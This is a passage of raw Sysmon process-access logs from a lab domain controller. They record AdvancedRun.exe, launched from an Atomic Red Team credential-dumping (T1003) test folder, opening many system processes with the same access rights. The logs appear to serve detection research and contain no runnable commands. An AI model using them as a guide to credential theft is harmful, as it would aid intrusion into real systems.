17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953041Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953040Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953039Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953038Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953037Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953036Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953035Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953034Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953033Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953032Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953030Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\Atomi